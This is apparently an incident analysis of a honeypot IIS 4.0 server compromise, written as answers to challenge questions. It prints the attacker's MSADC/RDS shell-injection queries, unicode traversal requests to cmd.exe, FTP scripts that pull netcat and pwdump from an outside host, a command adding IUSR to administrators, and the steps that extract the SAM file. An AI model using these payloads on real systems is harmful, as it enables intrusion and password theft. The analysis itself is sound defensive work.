Tools Used to Analyze |
|
Which exploits were used to attack the system? |
|
How were the exploits used to access and control the system? |
|
What was done once access was gained? |
Note: The hacker made several typing errors which caused redundant yet incorrect syntax commands and are hopefully left out of this analysis. The main problem I saw was trying to get the correct case for the unicode exploits. Which turned out to be lowercase (../..%c0%af../..) Using *NIX vs. DOS commands also added to this problem.
|
Most likely used MSADC.PL |
GET /msadc/msadcs.dll HTTP/1.0 ----------------------------> Is the target vulnerable? HTTP/1.0 is used here for GET and 1.1 for POST as in msadc.pl, also attacker uses 1.1 in his/her GET commands HTTP/1.1 200 OK
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1 ----------------------> Is RDS available/working? User-Agent: ACTIVEDATA
-----------------------> Yes! |
Test RDS by creating a file called fun and placing the text werd in it. |
S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c e c h o w e r d > > c : \ f u n " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1 -------------------------------------------> view the fun file |
Copy Some Server Files |
Move CMD.EXE GET /msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1 ---> Copy cmd.exe to the directory hacker will be working from. Rename Default.htm copy default.htm default.html --------------------------------------------------------> Upload own version of default.htm later. Re-write default.htm file ??? usually some type of defacement would occur here. echo . >>default.htm ------------------> Attempt to overwrite the default.htm file with a . ? Did not work because Hacker used the append operator. The default.htm page was viewed by a visitor from 213.46.45.28 using a GET with 1.0 just as the echo command was being called and got the current page. The Attacker then issued a GET / with 1.1 command and the results were the same except for the . was added after the </HTML> tag and had no effect on the page. |
Need some Hacking tools |
Attacker successfully placed 3 files on the server from his/her FTP site: pdump.exe --- I assume this is pwdump.exe because of the samdump.dll file also uploaded. The directory listing shows 32,768 bytes which is the size of pwdump2 (actually the second version of pwdump2 which uses a new API call so the user does not need to pass the lsass.exe PID) Netcat.exe --- Port redirector Samdump.dll --- dll for injection from pwdump.exe. Hacker had to try several times to compose correct FTP strings via echo commands redirected to a file. The following files were created through a series of echo commands to send to the FTP program for automated execution.
Using ftp with the -s:filename option executes the commands in the file allowing for easy FTP access. |
Upload/Download of files via FTP |
Uploaded Netcat.exe, Pdump.exe, and, Samdump.dll to web server. FTP Execution String via RDS: S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c f t p - s : f t p c o m - n w w w . n e t h e r . n e t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : w i n n t h e l p i i s h t m t u t o r i a l b t c u s t m r . m d b ; 220 freenet.nether.net FTP server (SunOS 5.7) ready. -----------------------> FTP attempt to this site did not work using the ftpcom file; Incorrect login. Attacker tried several RDS query strings without success. Working FTP execution strings: GET /msadc/../../../../../../program files/common files/system/msadc/ cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1 220-Serv-U FTP-Server v2.5h for WinSock ready... 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- USER johna2k 331 User name okay, need password. PASS haxedj00 230 User logged in, proceed. PORT 172,16,1,106,12,71 200 PORT Command successful. 150 Opening ASCII mode data connection for nc.exe (59392 bytes). 150 Opening ASCII mode data connection for pdump.exe (32768 bytes). 150 Opening ASCII mode data connection for samdump.dll (36864 bytes). 226 Transfer complete. -----------------------> 1 for each transfer/redundant 221 Buh bye, you secksi hax0r j00 Downloaded Whisker.tar.gz to attackers FTP site. GET /msadc/../../../../../../program files/common files/system/msadc/ cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1 220-Serv-U FTP-Server v2.5h for WinSock ready... 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- USER johna2k 331 User name okay, need password. PASS haxedj00 230 User logged in, proceed. PORT 172,16,1,106,12,87 200 PORT Command successful. STOR whisker.tar.gz 150 Opening ASCII mode data connection for whisker.tar.gz. 226 Transfer complete. 221 Buh bye, you secksi hax0r j00 |
Tried to enumerate users and passwords with Password Dump (pdump.exe) |
Using the RDS exploit, embedded the following
command in a query string: pdump.exe >> c:\yay.txt
S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u m p . e x e > > c : \ y a y . t x t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; c:\dir ----------------------------------------------> did it work? Volume in drive C has no label. c:\cat yay
------------------------------------------------------------------------------->
not a *NIX box need to use the DOS TYPE command c:\type yay
----------------------------------------------------------------------------->
need .txt Excuted NET User command to list users accounts on the server from the command line. Ran RDS query to store NET Session in textfile yay2.txt. 02/04/01 06:46a 38 yay2.txt ---------------------------------------------------------> 38 bytes - size of standard no entries message Type yay2.txt -- resulted in no entries in the list c:\del yay2.txt -- attempt to delete the yay2 file Ran command line net session into yay3.txt ----------------------------------------> access denied current rights will not allow execution need to use RDS. del yay3.txt -- attempt to delete the yay3 file |
Enumerate users on the server via Net Users command and RDS. S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t u s e r s > > h e h . t x t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; type heh.txt Attacker now knows what accounts are on the system. |
Hacker tries adding the IIS default accounts to the admin group |
NET GROUP command Tried several times with the wrong syntax. Why the IWAM account??? S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t l o c a l g r o u p D o m a i n A d m i n s I U S R _ K E N N Y / A D D " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; IUSR account!!! S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c n e t l o c a l g r o u p a d m i n i s t r a t o r s I U S R _ K E N N Y / A D D " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; NET LOCALGROUP - Command used to show users in groups. Was Hacker successful? Yes Alias name administrators
|
Time to try enumerating users and passwords from the SAM |
type sam._ S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c r d i s k - s " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c r d i s k " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; Quit trying to create a repair disk on the local drive -- $$hive$$.tmp is now over 3MB S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c t y p e c : \ w i n n t \ r e p a i r \ s a m . _ > > c : \ h a r . t x t " ) | ' ² d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; Volume in drive C has no label. Executed command type har.txt , was an actual SAM file. ASCII text contained the standard MSFC code at the beginning of the file copied har.txt to c:\inetpub\wwwroot. Executed command GET har.txt HTTP/1.1 -- easy way to copy to a file on the hackers machine and run a crack program against it. Server: Microsoft-IIS/4.0 Tried to delete the file har.txt No success through the exploited command line. S e l e c t * f r o m C u s t o m e r s w h e r e C i t y = ' | s h e l l ( " c m d / c d e l c : \ i n e t p u b \ w w w r o o t \ h a r . t x t " ) | ' d r i v e r = { M i c r o s o f t A c c e s s D r i v e r ( * . m d b ) } ; d b q = c : \ w i n n t \ h e l p \ i i s \ h t m \ t u t o r i a l \ b t c u s t m r . m d b ; |
Install NetCat (NC.exe) |
|
Miscellaneous Events |
|
How could this attack been prevented? |
|
How much time did you spend on this analysis and write-up? |
15-20 Hours |
Do you feel the attacker in question knew if this was a honeypot? |
Yes; echo best honeypot i've seen till now :) > rfp.txt |